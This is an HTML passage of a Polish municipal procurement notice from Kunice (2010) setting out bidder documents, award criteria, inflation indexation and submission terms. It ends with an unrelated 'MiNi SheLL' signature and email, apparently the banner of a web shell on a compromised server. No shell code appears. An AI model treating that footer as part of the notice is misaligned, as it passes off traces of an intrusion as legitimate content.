<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Stawka roboczogodziny - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>UWAGA:
Zamawiający przewiduje możliwość waloryzacji opłat eksploatacyjnych oraz stawki roboczogodziny w przypadku wzrostu wskaźnika inflacji powyżej 5% publikowanego przez Główny Urząd Statystyczny. Jeżeli wskaźnik inflacji w danym roku kalendarzowym nie osiągnie progu 5%, to zostanie sumowany w roku następnym a jego waloryzacja nastąpi  w tym roku, w którym osiągnie poziom powyżej 5%. Wtedy też rok ten będzie rokiem bazowym do naliczania stopy procentowej wskaźnika inflacji na kolejne lata.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kunice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kunice
ul. Gwarna 1
59-216 Kunice
pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 10:00, miejsce: Urząd Gminy Kunice
ul. Gwarna 1
59-216 Kunice
sekretariat - pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 20 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com